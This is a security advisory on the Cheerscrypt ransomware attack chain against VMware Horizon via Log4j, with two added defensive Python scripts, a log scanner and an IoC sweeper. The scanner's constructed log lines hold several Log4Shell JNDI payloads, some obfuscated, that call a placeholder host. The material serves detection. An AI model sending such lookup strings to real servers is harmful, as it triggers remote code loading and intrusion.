Previous targets have included organisations from the Financial, Construction, Advertising, and Healthcare sectors.
The Defence sector remains a potential target due to Chinese-state ambitions.
Severity level: High – This attack method is difficult to exploit; however, once successful, it may result in significant loss of sensitive data.
The Cheerscrypt ransomware has previously been associated with cyber-attacks against Western private organisations and is highly likely linked to the Chinese state-sponsored group ‘Emperor Dragonfly’, also known as ‘Bronze Starlight’. This assessment is based on the victims being targets of interest for the Chinese government and on correlation between public reports.
First detected in May 2022, Cheerscrypt is deployed as part of a chained attack made up of multiple malware strains: initial system exploitation by Night Sky, deployment of a Cobalt Strike Beacon, and finally post-exploitation and encryption of data by the Cheerscrypt ransomware.
The attack chain targets VMware Horizon via the widely reported Log4j vulnerability (CVE-2021-44228) to execute PowerShell commands, enabling the deployment of Cobalt Strike and ultimately Cheerscrypt. Swapping between multiple malware families within a single attack is designed to confuse defenders and obscure the attacker’s identity.
Successful exploitation will enable attackers to breach secure networks, steal data, and encrypt devices. Stolen data will be sold on the dark web for financial gain and to fund future attacks.
If compromised, detection will be obvious, as data will be encrypted and a message will be displayed informing you of the breach and the attacker’s demands.
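As an added example, not part of the original advisory and not the vendor's own tooling, the Python script below shows how a defender could screen web-server or application log lines from a VMware Horizon host for the Log4j (CVE-2021-44228) JNDI lookup strings that open this attack chain. It goes slightly beyond the plain case by undoing the nesting and URL-encoding tricks commonly used to hide the literal string "jndi". The log lines are constructed for the example, and the hostname evil.example is a placeholder.

```python
import re
import urllib.parse

# Innermost ${...} lookup: a body containing no further '$', '{' or '}'.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A normalised JNDI lookup followed by the protocol the attacker asks Log4j to use.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Expand one innermost lookup the way vulnerable Log4j 2 would.

    Only the lookups used to disguise 'jndi' are handled: the default-value
    form ${x:-y} (x is assumed undefined on the victim, so it yields y) and
    ${lower:..}/${upper:..}. Any other lookup is left untouched.
    """
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    kind, _, arg = body.partition(":")
    if kind.lower() == "lower":
        return arg.lower()
    if kind.lower() == "upper":
        return arg.upper()
    return match.group(0)


def normalise(line: str) -> str:
    """Undo URL encoding (up to two layers) and collapse nested lookups."""
    for _ in range(2):
        decoded = urllib.parse.unquote(line)
        if decoded == line:
            break
        line = decoded
    while True:
        expanded = _LOOKUP.sub(_resolve, line)
        if expanded == line:
            return line
        line = expanded


def jndi_scheme(line: str):
    """Return the JNDI protocol ('ldap', 'rmi', 'dns', ...) in the line, or None."""
    m = _JNDI.search(normalise(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line index, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed sample lines in a common access-log shape; not real traffic.
SAMPLE_LINES = [
    '10.0.0.5 - - [01/Jun/2022:10:00:00 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jun/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://evil.example/a}"',
    '10.0.0.7 - - [01/Jun/2022:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://evil.example/x}"',
    '10.0.0.7 - - [01/Jun/2022:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}ndi:rmi://evil.example/x}"',
    '10.0.0.7 - - [01/Jun/2022:10:00:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:dns://evil.example/x}"',
    '10.0.0.7 - - [01/Jun/2022:10:00:05 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2Fevil.example%2Fa%7D HTTP/1.1" 400 0 "-" "-"',
    '10.0.0.9 - - [01/Jun/2022:10:00:06 +0000] "GET /portal/?note=price%20is%20%24%7BPRICE%3A-10%7D HTTP/1.1" 200 12 "-" "curl/7.81"',
]

if __name__ == "__main__":
    for index, scheme in scan(SAMPLE_LINES):
        print(f"line {index}: JNDI lookup via {scheme} -> {normalise(SAMPLE_LINES[index])}")
```

Running the script over the constructed lines flags lines 1 to 5 and leaves the benign `${PRICE:-10}` line alone; the last line is there precisely because a naive `jndi` substring check would miss the nested forms while a naive `${` check would flag legitimate defaults. In practice the normalised line is what you want in the alert, since that is the lookup the server would actually have evaluated.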
VMware Horizon servers on both Windows and Linux.
Containment, Mitigations & Remediations
Customers are strongly recommended to update all VMware Horizon instances to the latest patch level so that they carry the current security fixes.
Additionally, customers are advised to use countermeasures such as Microsoft Defender to detect and block malicious attempts and malware infiltration.
Indicators of Compromise
Known Night Sky hash:
Associated Night Sky IP:
Known Cobalt Strike hash:
Associated Cobalt Strike IP:
Known Cheerscrypt hash:
Associated Cheerscrypt IP:
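As an added example, not part of the original advisory and not the vendor's own tooling, the Python script below shows how the hash and IP indicators listed above would be used once populated: it hashes files under a directory tree and flags any whose SHA-256 appears in the IoC set, and it scans connection-log lines for the IoC addresses. The hash and IP values in the script are constructed placeholders (the hash is computed from a constructed byte string so the match can be demonstrated offline, and the addresses come from the 192.0.2.0/24 documentation range); they must be replaced with the values from this advisory.

```python
import hashlib
import os
import re
import tempfile

# Placeholders only: substitute the hashes and IP addresses from the advisory.
# The hash is derived from a constructed byte string purely so that the demo
# below produces a match; 192.0.2.0/24 is a reserved documentation range.
CONSTRUCTED_SAMPLE = b"constructed stand-in for a dropped payload"
IOC_SHA256 = {hashlib.sha256(CONSTRUCTED_SAMPLE).hexdigest()}
IOC_IPS = {"192.0.2.10", "192.0.2.11"}

_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def sha256_file(path: str) -> str:
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def find_ioc_files(root: str, ioc_hashes: set) -> list:
    """Walk a directory tree; return relative paths whose SHA-256 is an IoC."""
    wanted = {h.lower() for h in ioc_hashes}
    matches = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # unreadable or vanished: skip rather than abort the sweep
            if digest in wanted:
                matches.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(matches)


def find_ioc_connections(log_lines, ioc_ips: set) -> list:
    """Return (line index, IP) for every log line that mentions an IoC address."""
    hits = []
    for i, line in enumerate(log_lines):
        for ip in _IPV4.findall(line):
            if ip in ioc_ips:
                hits.append((i, ip))
    return hits


# Constructed firewall-style lines; not real traffic.
SAMPLE_CONN_LOG = [
    "2022-06-01T10:00:00Z ALLOW TCP 10.0.0.5:51000 -> 10.0.0.20:443",
    "2022-06-01T10:00:03Z ALLOW TCP 10.0.0.20:49300 -> 192.0.2.10:443",
    "2022-06-01T10:00:09Z DENY  TCP 10.0.0.20:49301 -> 198.51.100.7:8080",
    "2022-06-01T10:00:15Z ALLOW TCP 10.0.0.20:49302 -> 192.0.2.11:80",
]


def demo() -> dict:
    """Build a throwaway tree with one IoC-matching file and run both checks."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "tmp"))
        with open(os.path.join(root, "tmp", "beacon.bin"), "wb") as f:
            f.write(CONSTRUCTED_SAMPLE)
        with open(os.path.join(root, "readme.txt"), "wb") as f:
            f.write(b"benign content")
        files = find_ioc_files(root, IOC_SHA256)
    return {"files": files, "connections": find_ioc_connections(SAMPLE_CONN_LOG, IOC_IPS)}


if __name__ == "__main__":
    print(demo())
```

Point `find_ioc_files` at the web-root and temporary directories of a Horizon host and `find_ioc_connections` at egress firewall or proxy logs; a hit on either is grounds to isolate the host and start incident response rather than simply delete the file.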
There is a realistic possibility that targeted Chinese attacks against Western organisations are conducted as ransomware operations to mask government-sponsored espionage under a guise of financial motivation. This shifts blame away from the Chinese government and obscures the true motive of intellectual property theft.
While there are no reports of this attack method directly targeting the defence sector, the sector is almost certainly a top priority for the Chinese government and future attacks cannot be ruled out.
Chinese State-Sponsored ‘Emperor Dragonfly’
Night Sky tactics, techniques and procedures (TTPs):
T1005 – Data from Local System
T1021.002 – Remote Services: SMB/Windows Admin Shares
T1027 – Obfuscated Files or Information
T1047 – Windows Management Instrumentation
T1048 – Exfiltration Over Alternative Protocol
T1059.001 – Command and Scripting Interpreter: PowerShell
T1059.004 – Command and Scripting Interpreter: Unix Shell
T1078 – Valid Accounts
T1190 – Exploit Public-Facing Application
T1486 – Data Encrypted for Impact
T1497 – Virtualization/Sandbox Evasion
T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1569.002 – System Services: Service Execution
T1570 – Lateral Tool Transfer
T1574.002 – Hijack Execution Flow: DLL Side-Loading